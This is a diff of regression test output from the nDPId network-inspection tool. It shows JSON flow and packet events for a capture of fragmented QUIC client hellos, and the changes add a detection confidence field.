NkT8sYUuZrYsCN0\/vodaBZ64dqsKu\/0ntZ5Z7umvCbm7mnmp1P5JPIv8e5JTwTetx99GUoYM3Lss9UBBF+N+ZQAlvbgchHFwLlztR3qBr4DSeiBRa\/QCa9pwK0wrcW1wd7wQAaeeQE+HUQqzk21mGA3Ni9eqhg0A8mBSXeo4q6Zbc1Qge7LZjkMnbzwWQRN86QRzXhr6ZqznhJsrs2gf+6K0tcETEYFPcH1LtJTTUs0yfQDuzNUGO8Ljn5FQDD1zpRSvh8s7V0XLbAMDnVaIpCgJ\/Wzfpib6V2K6uy3y\/tnIOG\/KewueYVtxjddYzCJF8gOJKnl9hkHLvDnXYvahVHmmsSXkZEDuqEbBU3dhSvWdcTWMI6EGZ1la\/dvApDNmcb5oVn\/GyXnv8p4\/EaQDcSPgEq7tqrMT4zz16ib8ts2HPUFH18kMT2Lkh0kzLngKGYmQr4ud1DxA0Xh2OTA094JKybionwnwYmG0hB+bs0+W3t+x24Ktmr3UI23QaXnYhGjWDsFVhEwqC9edY1GzRBOF4JKsc9W3v+2U\/SN1VrKcc+Bevpa1\/hwmOmIR9UqFFRGYZ8XqCMSHhBSXZ98GHc6Tp8dIXH3GFzyONX70YreOQv70uYLLo5G7B3vB2RKjJ7e8jXDVU+JXnIlEp+p7OvLVmWZJ6HiKz1yl5dXohIS933mpnocVqWJKEIp+M6mIafetUbr7l3ub98qfRhhtDelAeHRUPJsEnbTDiebfukKletmLj2M9uqS88Nv+AYjq94MlKBVGJG0hWh9iwuuwJZCZQrbtQK7QrfvlcDDCr5e3q0MYyc3hLW0S3LNDLCzhZJHuh94K3qh3XmLNI48az6btORNC5VVHVviSCJzpyJi4AAhwk+vZEFTRHuM1FcBw3q6LFjAesbh3fvCHe8qk7EVnRd8k1OJ5pwTXlX6oar7LdQggPhSRol48jQ1hU6ZrFWWYfQPGtgNuW+QSDJwzQMXWphfVZa\/bjTSTMzzJaPxFEO8blcgWgJvyIWIDvvNVBD98ZAL8CsMvDFroJxvSZYdKcm6nvRcebluRLF9YOtvGfZtjUr\/cgCzoc03HDo0sme\/lIVgz3C75OcoWQzVAwwXgD9xeikHRVTVmRinnMrGdKATgKfjaUaxEe\/4wD1DfVumT5F9SapTR39kz6hwpsA7x0UFBknturrO+L+akqX6pIKp3yDxwqp2YSrQtxrQM2HIA0adAIfRYKkhcslIAE1vsvC5gIwRdKcF99Ry4D6WcmQtmyNTEyfKPVZfHdkM52cWvBas+\/FFczuVKVquG0n\/ExS78d7fjZpi2el681jYg7VOPeTHklXJ3AcX9vJRJlgZZPB6ZD\/pRbnoYkfAMjAtcvtRNTJbEv29pz2OQpvG9FDqKNggB4bJ4OOi9Yw0GTejnWMyT8AcCgKIWe5b\/j4tdp6cu+NFWIXuGtcykvaSvXLjzYQp51JSgMBZ\/5jwYYoRMQZPWnJD0NMzZbO\/PZqzoW54JcJfedD6PsbQwfEVZ9qO0uZe4XJyGo7xXMW9qheN5A485AGg930nGI0W4y9g06HYqEC6FZbTUGCQFaccVVPlPrwvI0zP0AD0MaiXvO5tGDdy"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1621516402235,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516402235,"pkt":"AAAAAAAAAAEAsa95CABFAAViORdAAH8R4qKokEAFH9vSYPT\/AbsFThF\/xP8AAB0IsiNjxAytUVgAAEU0VlWdZoCCvojlDyfa5Yeon08C9NEt7N1hxHGcl7FpDE5Z3Q9X5dOjGppxQuVZ+atKIAVvgbCcQVIhusNpashx33gtd6EhS7ZbKLvO4fc3PTuNql6Czjwc6b46RvYtjQHiYIFYBl31X9KsUf7sMEKMhQUWKvfytWSeM45U5GBkmLvf17D8qsLlZCvoAeY6VEYDPspoPXzAUYzFOsd5enOX3RMYkXxLlblB5gix22C\/+sUNmj+ugdjQw4gu\/fkb\/+jonN8oHz6zQAE\/PJV90A06PszzVUFctBVjZ+j5Pwz9BjozUZUg\/GO5kFR0Af1qvNMmXh\/0QoCYJzAEaSM5LZn5V9IadKyhWiAGb8bAhV2XnJfQfmszIOGoMMvaWthG2XAg6x\/4\/kCr95Ae0+tDiO2FzVaWI0nLPloEgW0+kB\/0TGNzL\/+Vy4YFY4PXcSh85eAiYwO2DkbrwC03nysw9v0D2V7rEHgNEO6ioGGuKv6mypXkj4bSQLPMzAkTM2MsPkC+fXW3f0l+0+za4NKOaY89pjaqW7bgVrOTpwQh35a6XwDDTLsphXxpOh7dlW0BzLzs03vnjLkokDqzkTmNyVYHQO8+a6C3JeLEnZTxFmQiaQ\/1gRzZm7cpY8RY0zhtz+q3FIkzaFIF\/AjKzGOOu8+5nsDUVUSfBS+fHZOKMM2eOjApm\/tZzcNNW1fwyIXL8V76UchSVNHrOV\/Piqka9R1tk0T+z1Vj7bcbIKNxTymIgfuZHLa2ehhiJRTVxdu4QeBCbNLbQ4jG7byE2A+bFbGS9ipIAYjoC9DnqCMgvL8Cm1jbkt2kO1+bEwS4X5aZJPdFzz2GBsHA6OGk5nmPDDOrC2sdqH58ShIcD+ZsAFb5MukWegKexiZGTPy5BYnViMh9Y9GI1jxJu5njnFXaIQ8qVdUruJxMtud99K9OjWpL94NFcooWggckaFlC21iuud67L15UsBMt83hjPDeakhUa4qZ0kj0gWALzdK205K5Wfz4DWhthyqf9fEU0GZOnTCjN7AnpkGQn2Hlp4OnoxtlX5VmufNf\/lVgf2ZeVPKUxlrBcNx2HEOHT4sZ7wIF\/3lwFsTvQKcix65Wug2ejeP3G\/83G9Qzq7h9g+PnVu8KncBYgcDGbeJP1jGd5F\/P6eUEylVpUxF4tuws0zlFKw2bJb8x6Y+cBLwGKHVC0PIzIUIpEH69fnkOGqSdaY0lRMXb\/EEra3O5ioR+LwgLTB92diG8Q5e0s\/v92K3HdzYSQ8TlwUeQ+x9woWExu3b9kGovPv3+jFRaFsbNxKvTVSEfjQDcafUTKOb\/3tA7k+tucr5my+7aGjn+bHbFFsjfBLkQLeS3GRbQpzQHhNjNEkEbiyp731MXybRhTCm+Y1qLET9TlYhBtjM8a05Qog2XwlqEM8wi+y\/CzGxubwbN4IWOhgTc1yngE04OAmEFZfH\/4awrr4YU9tLSzhbY9S3EHvvjjZpSTP0GsdZ92WziUPVAuGPfXB9clRlvNZdmbyGKYmxwvtpU\/5Dl\/GHlToInQQEgn2cmkuIp5zl\/9SUAMeYZhTS4JmDwPt30EK+TXkoGbxB4QQxockp24t2DasNgEbms8\/JVTW0JUJN2vNzbFOqVhPBBqAfcGjPeup16sTpvDGGHGSO4mJvUva77\/RTW+jGu67NC3sq2HErt3plviATd1Ww\/aNLcM+QsfCyX3a3A\/690D7ucSmy3lf\/i05xvjR7bo\/jVQ7KGbD6vK9Qm2U\/cQbTyFQzcqzPZgkKzr+l1adiNiIM8S"}
 00627{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1621516405234,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516405234,"pkt":"AAAAAAAAAAEATej1CABFAAViOZ5AAH4Raq6okEAFwUSpZOPvAbsFTiT5x\/8AAB0IzUnHeeUSQdQAAEU03jPmRxAy9OYylQgB73DOlVrCptv7ErpnY22OTRmr4wpzgeK3KwkGuqc0xjcaspxGnr6AdaN2xcChMtA2Y7IUI6FXy98k3lvliYUdwlbegMDaM0s2kOCEH3Q5e1wd\/wXjWcr6N0oOzawFyp9hVXwI7Q0kOSYeJlKwoxbwIoGt7YBZmAiPcan7Bi5oQyWPAWydB90gyIdx0d8HsFpltVW32pTZeG6z2CP9KXzoqL1WsfRBKPQpLg6kv3oYavjTBDOfvbG3i544r1+YdmIOCTSwSyCmI9DGVk8MczSIbJC0RPe4X9d\/gCsVsymdal9TdwxBqTtK7tvHTjEjpE2Tf9zS8Q8Gc5XsubCb6PKWxtWdDuV+ITz8lHNBp53kMGc9znlCSGBJ+oNWkpzQI4G8VgjVItmF+Zywys9D14q0rl8JP2cQboFSCzBrnPL2a2zEjzaiN8\/C2LlW8weYHLtePs7UcOLWgLnvnVwptNummGBctwDMgBNNvBf2oQ2BT3akVv85DLHFo7Mik5zFKo8Hm+zpDV42cxV43jlo01t6MR7pOAu2JhmZ1+Gmh9i4DhIdmnuAVFChlq0EBq1oKQrR4fmUxA2rjS0OXNZUgpLHLlJHctUJX60aeAJebb5ddjnK1JqXBjlvfbOAxFBhwR585AVOc\/N64kRyneM8sM9R6sU9iPp3yIrQOhQ0fDG2w0PRRpVMOhUEH7zw11a2+aNeZLGXC\/6Y0wE1yXsUVHJVJWZCYd86aXC4954s3IHZMqezQRrL1APK0Uj3+9FDgBevGUuM+k\/7d0zQnJ4rTTwqaISHNag4vkTDqKoEyOQwoaqyXKoPHPHUetc\/U1Vqj5HbYafoEp++uRVCALzeb9EokrzQzuCDkwwF8fL5EJSue04WpPsmcpNQzG8CgHMNpnU5AEbkeVy\/Tm60yzyRqb5aB2QQGaHn7nU734znkp6LBO+x8dI+\/uS4XkpdHKVM+kYZtiYdPByeui07cdpE8sH7XxtZdaodU1va3LT6DdZOGuWd3tIpMbwiom5ZO+c\/sxrsYNosVZXax\/HOCVpOj9VoxFKdAe7TnQA3BtohBLmAQi8Ky9PiOLlrtiEWSg9vuNLm8rQjNzi0+N0HK+xINajobf3jP8DLsPNa3nLBja1BI0rYBIU3yqIKQ8Dl32xsc063rGPnZ+4xKu9Myfb2s3u3GI3oGkrhwU\/1sQwXPwuGtN7SwiZALjqLgHgfC\/8El\/VnwzeViayYEnclukedsZZq1ZR3YWbmiKeCCwlk9jmv2WHZEh8jZQ02nH\/6uAirsc4PzXtVqbEdP3Uf\/51U+sQ2p6kyPgxPJ0dJiulfpzegAk1g9URlFtj1Prm9nXN52Avs85Ku6PnWn2K5Oit6t5szIh7CpXNXZ\/r7lQTCzx1x4hjw2bMC4\/V4zZV4WAYezFgThubuHBYUA88rT2uj7dCArSt2N45qbwc4Mgwud71EluROJDlek42tV+tCsyiaMJdhkWkSEEHDQPlPnH1ij3N1iW3QwoTcs+h7cVopFBb+GUTNIJl1Qk9qCEm5UYTfWF6aVd987Lzl3tTyv5D0h+cV+Wv94Y6Bu\/GmojJU611wdu67nR\/gcxGb0oSe62fODz9zWZV7kmDKM8ibcM\/HbDPHzMlg3XQsDk+2kA7o3GGvnoL0ABy\/WVJWStRZAa5xIrmxaZRdp8pG0k8n7D0+KdVj++U2WeulgSlFklaHDSc62eMMQsSdHdlV62KC3i0iGJUMvejrPxkl+j6oLKhMF1+skGbQ5aFITVGA"}
-00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 02295{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1621516405310,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516405310,"pkt":"AAAAAAAAAAEATej1CABFAAViOaNAAH4RaqmokEAFwUSpZOPvAbsFTs7oyv8AAB0IzUnHeeUSQdQAAEU0YnBQC8L89wEgTmmr7BjHFODkqhpFJVx7yJAYrFg6afkiF3jCqd3RVPDW00NRXnMgjonKH81Ileorn5KxvS5+yQJRAfjCUHJ24j9a3WWl0AFqEbkF0TWWqMTP\/2idN+3yLS6puV95VhaYgqHrCvwkD4lAh7BWrsu31e\/HDOBztqIAj1XIxQN5nk4xsMisv2NZkICaS+1Cze8naUXXyoJiwMgIqBi5y8cABXF6JlVU6OWprkzVRIYKgbzPUVlJaith2PL9DAVy2TL8feQIj3EkaywH0gUPZYTZigDwJE1mDupdge9S6g+LSrQwDNdm8DmnC39N8zuv8VkX39gnJjPPIqLqt8YcZBaksYIxo+UVtdEoMWKD2dTTAbqL3muQp2Ja7H8Ae7XPH8EhKuwd7Kj3JTpB13ljCjHYeyiv5t8QcUXs+\/fTX+iNUrbYp27UUsB5CR6dNjgUgwn+qI9Kd2TVTpJFA+nvmNxH9t5xpLsEajZKGz0zBOH+ePQwjH4k6LiuIOgTcn56cc2K1OQr8g6DG6GL3qoUWI2dlMl0vWT7aDPYShopw41gzuRGjFELxdiX0M0b7As\/7rFy3G1wt+nR8GFD6BSLRMcYNH8HNXRu0MQO53XF18R+1YeIMH6X3b3CZuFq3Xfa2QILxODzwdrxgCNv+FS4NubkKVmTPXQe+uIgvq1qlryrWj\/xlUbBxH9IDjnd7Q4EC0wXt9aAeFTNi4El0ZGUFtEehFfXIXvGMKzGNTezfNJc+vD4F1uOWnnlAxd\/WNW79xPmd8oVDAkAoVRbYCE9wA05lkg9NHNsSNZQ4ZrHcfUP3vf64MKK+pkwlt\/1KIFbaqjllgaHwuNOpxQyFKZGOQ4mRm7MxKALa4\/fjze0Xdw0la4zY+K2Z6UBx0Bbe33vd2rVATAwh3fRljk25dM6tgVCsvKusLkEvU9VmPywN52CzB84wZBRt5xcE29SdbS99xZjGg98qXqdNlTjjAt8yu4XiAjezSVKKaQD3XaLeqSlZUs2O+44zB3zNNhhO5e5eFJ7vU6rWJlnEoMb5o7Dpqgg5GZm09GTgXY6uCnh4ZTxl96ofiZvX7ChhymeUh74eA1f1x3k5LEP7B+VvfkqNzqwQdVy+JB7y82M7PRA6h\/ZiXREpEY5E7rUhHhHzsCHTcFbeJCcw1KDmA\/8lN\/ad5x9wDVKuns1EoyFDZ39IMuXsGoV5K49EtAXhlRXfF2+Q4uYSZtKRw+dUt75YzrYSQ29ZHDGQClAhl8wOBfpzHpggjQ+gFIEYw0xq4417mXTvRAsHPlxM8bRQ8PcXIpBD1+\/T32bKmOrmzAVOK\/uM2XxkngmepayHjfPWCQlEhv1MTTUXO5FOHEIKK7YeWXB+45P5Jdn5DUTLIpWlu36Orwifl8JevozrwmxoIG1Zmf2m08oeXHqRUDXmNzjkDF8iRRGAJYOtcDtsPuCEzBA8dRTgS0HKprk4UBlCXOdnUl0o\/GH1EJbFeV6skk5xrmue7uPiLAyEVcPX3pmiAAOX53KWWhMQls04leVWEcDeyAFwvaITqnSDWVveqnmXMRxLOFZt1iaMGSJOlk+UqoJqz6OkW7fNx\/lAaehebe7Eqav3QkkugEaA1AnUOpe9DMxV3jHzO0ZsRV9G3EYn8EZ\/3pjUJ7Wdzgs2pUQKiy\/\/eGQsIQ+E9g46xeFn8UPrN8eiX3DgHzFdvQqN7n6GdAWkhJ2Tw7Bq6m8tC3wcytkE68x8FsP0lQnhvRc9Pi1wMCcL9Y5E9amIXbruhOYiuKw"}
-00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621516405234,"flow_last_seen":1621516405310,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516405310,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}}
+00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":174,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1621516405234,"flow_last_seen":1621516405310,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516405310,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}}
 02303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1621516405464,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516405464,"pkt":"AAAAAAAAAAEATej1CABFAAViOaxAAH4RaqCokEAFwUSpZOPvAbsFThhFwP8AAB0IzUnHeeUSQdQAAEU0f14nS2wsq94otcbsx9Ja6N4Gglxg3u9DN5aawqtRKVNC4Pc2eIsI1t2bGSVlKf0XWigbLFgVoquYysOzgfEuJL\/MeSu45JN0vCO\/piH8bKThjLOmClUk1DH3WZNkFkEuaa0+lysZpqiBVvoWBmVXL7ELlhz6YnN18zze0\/2yDF90B6el4fx\/mt0wpW0qVA1R3rpNHACrqE8RyK6pVoPq3imcpEoLb3yO7yzrRrQA3ViWb4CcRSIQKKKvWiiBsQX5n0+0thXLMnu8ftL8SuxBDfepRmuDXajiiY60A0Ci0Vc1tK667yMn9eaC6rHTNh8nYovYhgNBYmIAwvsQCVPuw3uv7zcZj7QuzsQ+GoW7Ofo+0HVPqQPw3Fcv1w6\/sFDHM8ZQdgy\/TI9Xw4zrv10NHy01l+JQvzxLdL\/Mei6EzaqwXfOyDTaHClmTcUbiuXBRX2Vf7Bmroal1PmgVVCAi8AUTkagzmJDy6vDj2SKbbL\/ReTgBtoJf9YG9\/p5Hob\/OMMIyWWppTPBk2+0f1VYPZWnbqV9qBkb6EhNQ+49gd87e+9YYhhx1IWTlW9NLOLBaYwQFgXd9bbWWfmi29OGPyG3EG8nQHPU1eOA30M0hAL1iFzuLQ3C1KXPfegclGVZOp1CvUfjShhvg8c1OTN5s7Ps6ZLZZlgyBt9X6JmRDmehOI4NTymHV5ZtQR2lVl2TcptleL6k53AnKbBYD6fZ1m7Qm7wPSMZDBJsGDW2W75tps0sDwHgF2FlcJxcVSumnK5OY0dgyq\/v+QuVFHSKHpcM0iQXjJ9BYDELQJZka6TvX0wkBv\/HQW+INffppmt4qy4pX8Jnbh3Ni1t3tDnQ\/7fweO\/+RdKUkMiQ2HCjJPyE0ETTcZK654vByA7SxI0bxGOyrV39JtcFOkThujeZSYhhZM23Dz4XEH9y6JuKs63RrvY0IkUQVSK6GA0tRTMG3mwmAob\/hfPnlVRnA2pVbvTMeZUlWCHFzts0AL9+PXmCSER\/XfzrXwjfrJuvzm+7T\/lFRR+d\/i0xl2X0IkHFkuV9wydT+v0RqXfar5ItGT\/sh5mrWNveBVdVlQJkyY8DBePhN4ArItPiFG+htl6KN6q7WQdvLajCgHRaRtH4GQxWZtZmB1Fg3DZcxEek8e2BMmaOPY8gBgng9q608TDXo9Pt5mxnWStws0YA06UTqWaNh1x2Une7VSFk8tH41qCiAI\/n2bLjiAoqnpJB\/cQvnfvFuY74Da9t\/5SFaJC4LXt0ZQIRJhn8fMIsa+pDVIU+8qnOzaJqQU5AktC9HbX1ISQRPrusR+iRsZxLKNNS5lj2e3YvJYsOdA4xy3eH3PevVRBgLucZfc8W1Sg+7crP5FPF+V1oksLUAomnQAM+uLnpl7jWA5eWJfsqJT8r5wB\/HXm64IPwfS6kzQmr04rkzCSj4t9jKRGjOo1Cs0M2KVTyz5diNk8DfzKuTIVdn5aJBg\/JHs6Tfr60kgcyC4b4P7qkvjih7e9lIaD1s7QzKhQlA9RuZPuSNUkJNf9zFhAHrlKpelaHjuvOMD7bCvtJ13MWT53xGxxb3Tn2yae9wN5yrxBUdBvqKCc9sg8zRym9VCJUCAOFTs3LmsHQjtM74VOXrdEbkzWhp3f7mXZ2mms9zJ9eH6fhPzVnmEuOhWdc4vKs4t+Uni9Rz2QUxiNfcPb0AlKfZGRFS5DchrAfVT1vo9USbhMF3YNpBh\/huOyVHNzkm1++SOaPkTBO1wZlmVb\/GUDFQCUtbTRtKz5EY5n6osCa5b"}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1621516418037,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621516418037,"pkt":"AAAAAAAAAAEAYl3ZCABFAAViOjNAAH4RV2CokEAFB0d2G9\/nAbsFTh7BwP8AAB0IqOC6BJZvV6IAAEU0Dvi2qrd23QDxGu2B7vaN4MOlDBtGvpoN5pHp26m14lzRY20peRtUuQ9ptItsXATUG7EiTr9GCdRPLOQETwFtC6RhGNIdLTwnsdX1wtpxLn88sqordHPzeZRfgg7Si\/hIcgk2r6jQqYTKPyb2EXPMZun\/DZnzAKBT4U0s6IkU9DCx\/nVZgKb8ZQ0clSgRRcfwhUHErM8eTU8YJIOg18cKJLd06pcQOIJG7NWuFWxlP8hu\/nN0AYaI66fR8yko7HlWLvum1JaYm6FYnzxA32PBj5oh\/7LgHk9DvkAOButBFcUmyPrB4mG5I1fazNr3nwyskcAAwio84ahFtiK2AWGqstVtlbFkBz5vU1GgAY\/jFxeFFhQU9bkVT2J83JetFccigg0SDPuD5n+d+pF1ktpVFhfg9Pf7M1yVpEd2pTwggR6\/RMwbUXsIy6V\/3Zdy235MvBR99y9lqd30EtEWQFDwQx1rFv7OgXmz1sC52olWXTPJJtqeru5YJ4y1QXdwzngLTKdWwkivONoSni7YFaQywfkoSfUUq9yPIHkBPfRgLZjtRnJvNRzSUdIVLK+82oMRpqWSDyuehe79xRqTV3emacrIoUpKNe4ES0rwwIIxuczcriuAc\/oh36BCnJTnMLsUHOv35tL0tIW69QW2mqLxjVxs\/sB2ZTY81BvXCGKlb2GWWEZboz4kvNje42VnawDq2ARmXLjmZvqx5KpuiDDLCrFuudk1KPohXg8MYwloe1Z5ljen+Kflp\/0GhTarwpApPLhqD4dC0YGPGUPWy0M3SdsjYAYnO0ufi0JY1lS9wKfFr3M11xtfXz4eInUnYb5wKqBRyjzjYcDgMIhrig+xpGm3NO62u1F2ixUHh\/2sre7Dp47yLp70MwKIP+adl\/aS+nE3ZwouBFKcqjSAsPBSGZchE52M44ofrHvjCdZygdjpUAxYA3pbEVs8jkZwgMgJXo11MS4xaeJGvyTRcdWxgO7Z6GiCANH9t3fYZEhYzw2EjE5ykKJRHZRafzyzvQldpdzPPsPIEmtpkI3mtt2v+1cYj4DnaZTXJEzplScTixfIquKqwVCom+EBWD3psfkqjfjfGGAzGt5GoJ\/n556S51FLopQS5Sp3W5C+2M5ojItue3RQCrCTIS76Pfo66q4GsAOSUZ7\/hMt\/XWeMLHxlw2ixjPGWceCE+ADtTZrMdCOe\/3\/KfNqayz9c7lfFveFHD4SoBgMlybRWMCo89EVr9\/e9bgIvQH\/2HIKL\/1AnrBTYWGwjYvXcCZMo2XZ48Bf4TAHJOLQ27twcS66XbobssW7dEGTHzsxM2cbXA7Mt66nR8kV7FnqvM3Uw37ERNKYGRDJpbb0E5DL0AIoUX6jOOuHNgnhFdj03d8npRdhJrYtWfh1KUyehyWQPyGItDjRZyrH\/YzmHmQlGRGfRB2IOJPpW0Awf8t3u7i7GhjjxzZWH9y\/5\/UIGZyFN5xYeSW1RjHpBsgozg4u5tX+KFm7iqwM265C9T5IiUFRDJ7Y7z+ArBTMIKqef2Q0Utflwho4O5OPtNfbJpYHIlEDdM\/bpqXNeLkZvsI55ncrNB0jXRjS9R\/pqCZ1F8bfNDlgCa23mWVU\/e5BsYcM6YG+DEAJXDSOtIC6Sp\/ZcQNS4oqLP9h8MI0zXLT58ZIPXRXVMDFrxMhBGx\/6yOIu\/74H\/Y3fHvm7xBKcdhdXm+aB2FiySmLOWsjvBXvSzYQ3UF0qKHH+MtZqFhGOCJk+EykBVABGv1Auw7saDcOGWE1z6rr+udwYUhMrL"}
